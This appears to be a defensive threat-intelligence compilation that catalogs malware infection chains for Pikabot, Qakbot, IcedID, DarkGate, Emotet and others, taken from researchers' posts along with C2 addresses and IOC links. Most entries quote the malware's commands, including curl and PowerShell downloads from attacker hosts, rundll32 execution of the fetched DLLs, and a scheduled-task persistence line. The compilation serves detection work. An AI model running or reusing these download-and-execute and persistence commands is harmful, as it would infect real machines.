Top 50 Techniques & Procedures(RTC0019)

url > .zip > .js > .dll

#Pikabot - #TA577 - url > .zip > .js > .dll https://twitter.com/Cryptolaemus1/status/1709933199785418797

proxy everywhere

#Pikabot - #TA577 - url > .zip > .js > .dll

wscript PO_13670.js

cmd /c mkdir C:\ProgramData\LimdD\

WinHttp https://superrrdental.]com/H6F/dshjdsjkkd C:\ProgramData\LimdD\laminos.dll

rundll32.exe C:\ProgramData\LimdD\laminos.dll, HUF_inc_var

IOC’s https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_05.10.2023.txt

url > .zip > .lnk > curl > .dll

#Pikabot - #TA577 - url > .zip > .lnk > curl > .dll https://twitter.com/Cryptolaemus1/status/1709238615904018605

#Pikabot - #TA577 - url > .zip > .lnk > curl > .dll

cmd /c TZZ.pdf.lnk

curl http://207.246.78.]68/6kQh/T7t -o UL.log

rundll32 UL.dll, HUF_inc_var

c2’s 167.86.96.]3:2222 38.242.240.]28:1194 167.86.81.]87:2222 79.141.175.]96:2078 209.126.9.]47:2078

IOC’s https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_03.10.2023.txt

url > .zip > .lnk > curl > .vbs > curl > au3 > .exe

#DarkGate - #TA577 - url > .zip > .lnk > curl > .vbs > curl > au3 > .exe https://twitter.com/Cryptolaemus1/status/1708869147688419507

#DarkGate - #TA577 - url > .zip > .lnk > curl > .vbs > curl > au3 > .exe

cmd /c MFGT.lnk

curl http://136.244.92.]148/rdFR2/GbB -o fjw.vbs

wscript fjw.vbs

cmd /c mkdir c:\rqdp

curl http://81.19.135.]17:2351 -o nvptjf.au3

Autoit3.exe nvptjf.au3

IOC’s https://github.com/pr0xylife/DarkGate/blob/main/DarkGate_01.10.2023.txt

url > .zip > lnk > .vbs > .exe

#DarkGate - #TA577 - url > .zip > lnk > .vbs > .exe https://twitter.com/Cryptolaemus1/status/1708869147688419507

url > .xll > curl > .dll

#IcedID - #TA577 - url > .xll > curl > .dll https://twitter.com/Cryptolaemus1/status/1706635492224024765

#IcedID - #TA577 - url > .xll > curl > .dll

EXCEL.EXE Sr.xll

cmd /c curl -o c:\users\public\9y.dat http://135.125.177.]95/syK/3IldTx

rundll32 c:\users\public\9y.dat scab /k besogon728

Samples 👇

https://bazaar.abuse.ch/sample/310b9b7f54880f2142882e39637d73dfc8542eab06ac1bb9ec597b801979b4d8/

https://bazaar.abuse.ch/sample/f45d0303851f913cef47b612211d603449cedaab4df3484048c8473b9d71d96a/

IOC’s https://github.com/pr0xylife/IcedID/blob/main/icedID_09.26.2023.txt

pdf > url > .js > ps > .dll

#Qakbot - BB32 - pdf > url > .js > ps > .dll https://twitter.com/Cryptolaemus1/status/1669669651486240769

#Qakbot - BB32 - pdf > url > .js > ps > .dll

wscript Cx.js

powershell $res = "http://149.154.158.]191/znxlW/MGjrJji3RDB"; foreach ($Fo in $res) try {$Go = FromBase64($Fo)); iwr $Go -O C:\ProgramData\99.9.dll

rundll32 C:\ProgramData\99.9.dll,must

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB32_16.06.2023.txt

.pdf > .zip > curl > .dll

#Qakbot - obama268 - .pdf > .zip > curl > .dll https://twitter.com/Cryptolaemus1/status/1669024540482052103

#Qakbot - obama268 - .pdf > .zip > curl > .dll

wscript CalculationOfCosts-1337.js

cmd.exe /c mkdir C:\Koltes\Fertiol & curl https://rapiska.]com/1337dat --output C:\Koltes\Fertiol\Floster.OCX

rundll32 C:\Koltes\Fertiol\Floster.OCX,must

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama268_14.06.2023.txt

url > .zip > .js > curl > .dll

#Qakbot - BB32 - url > .zip > .js > curl > .dll https://twitter.com/Cryptolaemus1/status/1668965414867443712

#Qakbot - BB32 - url > .zip > .js > curl > .dll

wscript.exe docu_DF631_Jun_14_1.js

curl.exe -o c:\users\public\amounted.tmp http://192.121.17.]149/QmVep/DB278

conhost.exe rundll32.exe amounted.tmp,must

rundll32.exe amounted.tmp,must

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB32_14.06.2023.txt

.pdf > .zip > .js > .msi > .dll

#Qakbot - obama266 - .pdf > .zip > .js > .msi > .dll https://twitter.com/Cryptolaemus1/status/1664300425829404673

#Qakbot - obama266 - .pdf > .zip > .js > .msi > .dll

wscript.exe ProjectFunding_1337_Jun01.js

msiexec.exe /V

rundll32.exe C:\Users\Admin\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama266_01.06.2023.txt

BB19 - .html > url > .js > .ps > .dll

#Pikabot - #Qakbot - BB19 - .html > url > .js > .ps > .dll https://twitter.com/pr0xylife/status/1636402413912354816

#Pikabot - #Qakbot - BB19 - .html > url > .js > .ps > .dll

wscript.exe LL.js

$Mag = (https://hanika-inc.]com/mjnPR9/uo)

foreach ($washman in $Mag) {try {Invoke-WebRequest $washman -O $env:TEMP\Sulfuryl.dll

rundll32 $env:TEMP\Sulfuryl.dll,LS88

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB19_Pikabot_16.03.2023.txt

.pdf > .zip > .wsf > xmlhttp > .dll

#Qakbot - obama264 - .pdf > .zip > .wsf > xmlhttp > .dll https://twitter.com/Cryptolaemus1/status/1661413082982170628

#Qakbot - obama264 - .pdf > .zip > .wsf > xmlhttp > .dll

wscript.exe Claim_C736.wsf

var u = "http://45.76.58.]72/a0UFMZnC6ltxphw.dat" http.open("GET", u[i], false)

conhost.exe rundll32.exe C:\Users\Public\amLE5PKlGAXrhpU.dat,bind

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama264_24.05.2023.txt

.one > .iso > .chm > ps > .dll

#Qakbot - BB24 - .one > .iso > .chm > ps > .dll https://twitter.com/Cryptolaemus1/status/1648632165742137344

#Qakbot - BB24 - .one > .iso > .chm > ps > .dll

hh E:\README-JRN44.chm

powershell $sensillum = ("https://hotellosmirtos.]com/sjn/Tn0Q3nieE")

foreach ($form in $sensillum) {try {wget $form -O $env:TEMP\hexatetra

rundll32 $env:TEMP\hexatetra,Motd

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB24_19.04.2023.txt

.one > .img > .wsf > ps > .dll

#Qakbot - BB22 - .one > .img > .wsf > ps > .dll https://twitter.com/Cryptolaemus1/status/1643614470164340736

#Qakbot - BB22 - .pdf > .zip > .wsf > ps > .dll

wscript AprilDetails.wsf

powershell $spear = ("https://kmphi.]com/FWovmB/8oZ0BOV5HqEX")

foreach ($banter in $spear) {try {wget $banter -O $env:TEMP\Lownesses

rundll32 $env:TEMP\Lownesses,X555

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB22_05.04.2023.txt

url > .js > ps > .dll

#Qakbot - BB33 - url > .js > ps > .dll https://twitter.com/Cryptolaemus1/status/1671489179262369792

#Qakbot - BB33 - url > .js > ps > .dll

wscript Ix.js

powershell -encodedcommand $N = "http://151.236.14.]60/c1oHe/q9cRd2n0"

md C:\ProgramData\SNWSlycop

iwr $Brunt -O C:\ProgramData\SNWSlycop\joind.dll

rundll32 C:\ProgramData\SNWSlycop\joind.dll

IOC’s https://github.com/pr0xylife/Qakb

Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL

Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL c2: ebothlips.com https://twitter.com/k3dg3/status/1612860949773389835

Today’s #IcedID “1421378695” dropped via PDFs with payloads hosted on firebasestorage.googleapis.com.*

Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL c2: ebothlips.com

https://bazaar.abuse.ch/sample/1796aef0940e800bcb2556782f92a7874422bbdfdda24e6658e43db4b0916850/

hijacked emails > PDF > Cookie Reloaded URLs (prometheus tds) -> JS > payload via CURL > IcedID https://twitter.com/k3dg3/status/1697331227940798731

#IcedID “4240553492” rolling in

c2: oopscokir.com ProjectID: 4240553492

filename: inv_ug_08-31_[0-9]{3,5}.pdf Curl payload ex: hxxps://avestainfratech.com/out/t.php

tldr: hijacked emails > PDF > Cookie Reloaded URLs (prometheus tds) -> JS > payload via CURL > IcedID

email > PDF > URL > Keitaro redirect > zip > pass > exe

email > PDF > URL > Keitaro redirect > zip > pass > exe https://twitter.com/k3dg3/status/1683544196341219341

Incoming #IcedID “1561373935” filename: inv-details-jul23.pdf

Loader C2: filtaferamoza.com

email > PDF > URL > Keitaro redirect > zip > pass > exe

https://tria.ge/230724-w1dlaaha6w/behavioral1 https://bazaar.abuse.ch/sample/8b5529d29aeaf195889ebad68f2c3a390845e173edfec923acaf25fed824a529/

url > zip > lnk / url > xll / pdf > url > xll > msi

url > zip > lnk / url > xll / pdf > url > xll > msi https://twitter.com/pr0xylife/status/1705331101365891455

#TA577 - Back on the scene pushing #Darkgate

Time to resume tracking operations, welcome back Tramp.

Distro 👇

url > zip > lnk

url > xll

pdf > url > xll > msi

Samples 👇

https://bazaar.abuse.ch/sample/026f4c95783ed33bc31c16a9a80842fa4a8efa4f67dff5a4739f90a8bc49a219/

https://bazaar.abuse.ch/sample/2eee7af95e457c97fb0bc3a91a00931c3c33e72f864e9bf4289565cba15ae484/

https://bazaar.abuse.ch/sample/bb2434f22b2fb7801cdd2b81e2b28a41a2beb2dc72b3d07ffec0e0f120c7a4bf/

https://bazaar.abuse.ch/sample/5bc060bd720757919db4f54f97e74b7110c67cf934423f86ffd483c7e2c367e2/

.zip > .doc > .dll

#Emotet - epoch4 - .zip > .doc > .dll https://twitter.com/pr0xylife/status/1633096910008467459

#Emotet - epoch4 - .zip > .doc > .dll

WINWORD.EXE /n INVOICE 589 03_23.doc /o

https://midcoastsupplies.]com].au/configNQS/Es2oE4GEH7fbZ/?135704

regsvr32.exe C:\Windows\system32\MSBjdGgEfuEG\evPaAyJzdCSx.dll

IOC’s https://github.com/pr0xylife/Emotet/blob/main/e4_emotet_07.03.2023.txt

.pdf > .url > .zip > .iso > .cmd > .exe

#IcedID - .pdf > .url > .zip > .iso > .cmd > .exe https://twitter.com/pr0xylife/status/1616464950138109953

#IcedID - .pdf > .url > .zip > .iso > .lnk > .cmd > .dll

cmd.exe /c REF_Document.lnk

cmd.exe /c sacsimsapI.cmd

rundll32 standing.dat,init

c2’s

http://umousteraton.]com

Samples here 👇

https://bazaar.abuse.ch/sample/3390b1d8560f565ed5e2a60df63ce24abe0ef3da514cf5645dd732f7e5cdbbae/

https://bazaar.abuse.ch/sample/ad174760985c5418b4a3c3a97cd8d7658e3bbb7030f72f2eff9ff97e57f200bd/

IOC’s https://github.com/pr0xylife/IcedID/blob/main/icedID_20.01.2023.txt

url > .zip > .one > .hta > .curl > .dll

#Qakbot - BB12 - url > .zip > .one > .hta > .curl > .dll https://twitter.com/pr0xylife/status/1620751340485120001

#Qakbot - BB12 - url > .zip > .one > .hta > .curl > .dll

mshta Open.hta

curl -o C:\ProgramData\index.png --url billmanagersystem.]com/ikA/d.gif

rundll32 C:\ProgramData\index.png,Wind

Samples 👇

https://bazaar.abuse.ch/sample/6c49b4d40b2925a4e5910e4157f7d302acf9203192187d3d1d178c258239f1c3/

https://bazaar.abuse.ch/sample/284f0fabbdfc1172cb1cbf74473321668c4b31789d93158669f6735bec124817/

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB12_01.02.2023.txt

.pdf > .zip > .js > .dll

#Qakbot - obama270 - .pdf > .zip > .js > .dll https://twitter.com/Cryptolaemus1/status/1671528958192496640

#Qakbot - obama270 - .pdf > .zip > .js > .dll

wscript RrwuR.js

powershell -enc $bread = "https://viltare.]com/PlI6qXoN.dat"

md C:\ProgramData\SNWSPinna

iwr $Medio -O C:\ProgramData\SNWSPinna\Pinna.dll

rundll32 C:\ProgramData\SNWSPinna\Pinna.dll

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama270_21.06.2023.txt

url > .zip > .vhd > .lnk > .cmd > .cmd > .dll

#Qakbot - BB09 - url > .zip > .vhd > .lnk > .cmd > .cmd > .dll https://twitter.com/pr0xylife/status/1599787375311212544

#Qakbot - BB09 - url > .zip > .vhd > .lnk > .cmd > .cmd > .dll

cmd /c HG.lnk

cmd.exe /q /c pests.cmd

cmd.exe /K dispersers.cmd system rundl

rundll32 erect.tmp,DrawThemeIcon

Samples 👇

https://bazaar.abuse.ch/sample/15c1feb12ecedafc233ebec6e0893ed0294f91ad48da9cc89c571ce3e316980d/

https://bazaar.abuse.ch/sample/c6887e515b36694e8e738c0df7610014e084bcce80ee13c998087471daf039a4/

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB09_05.12.2022.txt

url > .zip > .xlsb > .dll

#Qakbot - bb - url > .zip > .xlsb > .dll https://twitter.com/pr0xylife/status/1577671455336194049

#Qakbot - bb - url > .zip > .xlsb > .dll

CreateDirectoryA C:\Hefagga

CreateDirectoryA C:\Hefaggad\Ukdfaovkga

http://metroberrylocalmarketing.]com/7z8b/0.html

regsvr32 /s calc

regsvr32 C:\Hefaggad\Ukdfaovkga\Buuefafa.dll

https://bazaar.abuse.ch/sample/d3788e69dd125449af3d985de93701c49cef0658bc98e3b449185f86cbee027d/

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_05.10.2022.txt

.html > .zip > .iso > .lnk > .png > .dll

#IcedID - .html > .zip > .iso > .lnk > .png > .dll https://twitter.com/pr0xylife/status/1575903382505590784

#IcedID - .html > .zip > .iso > .lnk > .png > .dll

cmd.exe /c start ru^n^d^l^l3^2 2cdb83ee-c76c-4d7c-b9bc-2f4aab08f773.-Tf,PluginInit

rundll32 2cdb83ee-c76c-4d7c-b9bc-2f4aab08f773.-Tf,PluginInit

https://bazaar.abuse.ch/sample/0ab12d65800f3e7e6089fe3c534911f0b42d9175bcf955e937edd39e8bb2c13a/

c2 http://triskawilko.]com

IOC’s https://github.com/pr0xylife/IcedID/blob/main/icedID_30.09.2022.txt

url > .zip > .lnk > curl > wscript > curl > .dll

#Qakbot - bb - url > .zip > .lnk > curl > wscript > curl > .dll https://twitter.com/pr0xylife/status/1570064310923304962

#Qakbot - bb - url > .zip > .lnk > curl > wscript > curl > .dll

MD "C:\ProgramData\A_Np\fcA"

curl.exe -o %ProgramData%\A_Np\fcA\GCk.js ap2web.]com/MwS/13.html

wscript.exe GCk.js

paritoys.]com/9nD/130.html

regsvr32 REPORT_9MyMg_.SRm.IH.dll

IOC’s https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_14.09.2022.txt

.zip > .docm > .curl > .dll

#IcedID - .zip > .docm > .curl > .dll https://twitter.com/pr0xylife/status/1565354363765215238

#IcedID - .zip > .docm > .curl > .dll

cmd /c curl http://193.178.210.]58/-o c:\ProgramData\MH4SG6MYDDyi.dll && rundll32 c:\ProgramData\MH4SG6MYDDyi.dll,#1

https://bazaar.abuse.ch/sample/133245a337b1703f3940d8ca3907c9bb7ec6b47701257766e70d7c9318571ce5/

c2 http://donorcabr.]com/

IOC’s https://github.com/pr0xylife/IcedID/blob/main/icedID_01.09.2022.txt

EML>.tar.gz>.exe

EML>.tar.gz>.exe https://twitter.com/Tac_Mangusta/status/1709107786078982211

EML>zip pw>.url>SMB>zip>vbs>certutil

EML>zip pw>.url>SMB>zip>vbs>certutil>#Ursnif https://twitter.com/JAMESWT_MHT/status/1706919214588506202

pec > .zip > .url > .exe (smb)

pec > .zip > .url > .exe (smb) https://twitter.com/Tac_Mangusta/status/1703716708236570650

Mail(stolen old conv) > .zip > .js > .7z (psw) > .dll(key)

Mail(stolen old conv) > .zip > .js > .7z (psw) > .dll(key) https://twitter.com/Tac_Mangusta/status/1702247512529060244

USB > .lnk > .ps1 > .exe

USB > .lnk > .ps1 > .exe https://twitter.com/Tac_Mangusta/status/1678185981344731137

LZH > EXE

LZH > EXE https://twitter.com/reecdeep/status/1696539420219056590

Phish -> .rar -> .cmd -> .ps1 -> AutoIT -> force shutdown -> autorun persistence leading to execution of Metamorfo DLLs

Phish -> .rar -> .cmd -> .ps1 -> AutoIT -> force shutdown -> autorun persistence leading to execution of #Metamorfo DLLs https://twitter.com/0xToxin/status/1694756006889206044

Bumblebee

#Bumblebee Infection Flow TTPs🐝

[+] Mark-of-the-Web Bypass: IMG (T1553.005)

[+] Malicious File: LNK (T1204.002)

[+] Windows Command Shell: BAT (T1059.003)

[+] Rename System Utilities: copy & rename (T1036.003)

[+] Scheduled Task: schtasks.exe (T1053.005)

[+] Rundll32 (T1218.011)

https://twitter.com/Max_Mal_/status/1600847676270006272

HTML to PluginInit

[+] HTML Smuggling (T1027.006)

[+] Msiexec - .msi stager (T1218.007)

[+] Rundll32 - .dll loader (T1218.011)

[+] New export func: init, a short version of PluginInit🔥

#DFIR exec flow: msi > [RPC Install] > msiexec > rundll32 https://twitter.com/Max_Mal_/status/1600433854937866240

EML>Pdf>Url>js>url>js>url>PEDLL

EML>Pdf>Url>js>url>js>url>PEDLL https://twitter.com/JAMESWT_MHT/status/1678982791705378816

Onenote sample > Bat > curl url > Dll

Onenote sample > Bat > curl url > Dll https://twitter.com/JAMESWT_MHT/status/1641782661503918081

bat>certutil>exe>ps1>dropbox>2stage>certutil>fake invoice pdf

bat>certutil>exe>ps1>dropbox>2stage>certutil>fake invoice pdf https://twitter.com/JAMESWT_MHT/status/1658785799394000898

Qakbot js

Qakbot - JS -> DLL -> Sacrificial Process WmiPrvSE

conhost => conhost.exe conhost.exe conhost.exe rundll32.exe C:\Users\alice\noises.dat,next

conhost => conhost.exe conhost.exe rundll32.exe C:\Users\alice\noises.dat,next

conhost => conhost.exe rundll32.exe C:\Users\alice\noises.dat,next

rundll32 => rundll32.exe C:\Users\alice\noises.dat,next

rundll32 => rundll32.exe C:\Users\alice\noises.dat,next

explorer C:\Windows\SysWOW64\explorer.exe

https://twitter.com/ACEResponder

Pikabot

#Pikabot execution chain:

➡️ rundll32.exe .dll,Test (initial execution)

➡️ WerFault.exe (connects to PikaBot C2, in our case it's 45.85.235[.]39)

➡️ whoami.exe /all

➡️ ipconfig.exe /all

➡️ schtasks.exe /Create /F /TN "{B220CD07-2339-4E8E-8FDD-DF2C6D1B42DC}" /TR "cmd /q /c start /min \"\" powershell \"$HydrofluoboricInclaspedNonredressing = Get-ItemProperty -Path HKCU:\\Software\\HydrofluoboricInclaspedNonredressing; powershell -encodedcommand $HydrofluoboricInclaspedNonredressing.ParodyRoisterImpressibly\"" /SC HOURLY /MO (example of the scheduled task as a persistence mechanism, the registry values and task name can change)

NOTE: whoami, ipconfig, schtasks were spawned from WerFault.exe

➡️ PowerShell execution: powershell "$HydrofluoboricInclaspedNonredressing = Get-ItemProperty -Path HKCU:\\Software\\HydrofluoboricInclaspedNonredressing; powershell -encodedcommand $HydrofluoboricInclaspedNonredressing.ParodyRoisterImpressibly"

➡️ PowerShell execution (child process): "powershell.exe" -encodedcommand [REDACTED] -> decoded output is provided in the screenshot

➡️ curl.exe --url hxxps://192.9.135[.]73:1194/neurophysiologist/D3CAP09duSVlX?TransitorilyVerbosities=y4EB3Rb -A upb4geF6poodkVW2YaySEzk4C32sCDV -X POST --insecure (sends the POST request out to one of the IPs in the decoded output)

➡️ powershell.exe start rundll32 $env:APPDATA\Microsoft\HydrofluoboricInclaspedNonredressing\ParodyRoisterImpressibly.dll, Test (starts the PikaBot payload)

➡️ The POST request sent to C2: {"ParodyRoisterImpressibly":"CgBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwASAB5AGQAcgBvAGYAbAB1AG8AYgBvAHIAaQBjAEkAbgBjAGwAYQBzAHAAZQBkAE4AbwBuAHIAZQBkAHIAZQBzAHMAaQBuAGcAXABQAGEAcgBvAGQAeQBSAG8AaQBzAHQAZQByAEkAbQBwAHIAZQBzAHMAaQBiAGwAeQAuAGQAbABsACwAIABUAGUAcwB0AAoA","success":"true"} (Base64-encoded string contains the command to execute the PikaBot DLL payload on the host)

https://twitter.com/AnFam17

#Qakbot DLL Side-Loading TTPs DFIR exec flow: ZIP > EXE&DLL > curl > rundll32

#Qakbot DLL Side-Loading #TTPs #DFIR exec flow: ZIP > EXE&DLL > curl > rundll32 https://twitter.com/Max_Mal_

Redirect Services

⚠️ Legitimate Services Abused For Phishing Purposes

1- Bing Redirect - https://app.any.run/tasks/9a1e55eb-05c5-499b-b995-d5ef0e275394?utm_source=twitter&utm_medium=post&utm_campaign=task1&utm_content=linktotask&utm_term=031023/

2- Google AMP - https://app.any.run/tasks/544a7608-87b2-4e37-9804-556151684be5?utm_source=twitter&utm_medium=post&utm_campaign=task2&utm_content=linktotask&utm_term=031023/

3- Microsoft Customer Voice - https://app.any.run/tasks/e239ecc0-74cf-45ed-9f15-f4a9b35fe65e?utm_source=twitter&utm_medium=post&utm_campaign=task3&utm_content=linktotask&utm_term=031023/

4- Cloudflare R2 Dev Bucket - https://app.any.run/tasks/41d192ee-95d9-4aed-a8eb-7b1819f5865c?utm_source=twitter&utm_medium=post&utm_campaign=task4&utm_content=linktotask&utm_term=031023/

https://twitter.com/anyrun_app/status/1709193919118844267

VBS -> PowerShell -> Stego Hidden Payload -> Downloader DLL -> LimeRAT

https://twitter.com/dark0pcodes
